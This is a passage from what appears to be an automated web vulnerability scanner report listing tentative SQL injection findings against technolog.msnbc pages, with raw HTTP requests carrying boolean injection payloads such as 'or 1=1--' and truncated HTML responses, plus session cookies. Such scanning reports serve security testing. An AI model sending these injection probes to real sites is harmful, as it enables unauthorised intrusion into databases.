Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1217443745&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1217443745&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/201113719482'%20or%201%3d2--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=908365687&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=908365687&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.85. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /_static/feeds/3147.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19701695'%20or%201%3d1--%20 and 19701695'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static/feeds19701695'%20or%201%3d1--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:48 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40121

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=375089076&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=375089076&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

Request 2

GET /_static/feeds19701695'%20or%201%3d2--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40109

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=683616817&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=683616817&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&amp;ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /blackberry

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10556100%20or%201%3d1--%20 and 10556100%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blackberry?110556100%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120979

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621718033&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1621718033&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

Request 2

GET /blackberry?110556100%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120989

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=258204426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=258204426&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li cl
...[SNIP]...

1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://technolog.msnbc.redacted
Path:   /facebook

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /facebook?1%20and%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127223

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1384947188&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1384947188&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li
...[SNIP]...

Request 2

GET /facebook?1%20and%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127213

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=564508669&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=564508669&amp;do=msnbc.redacted&amp;ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
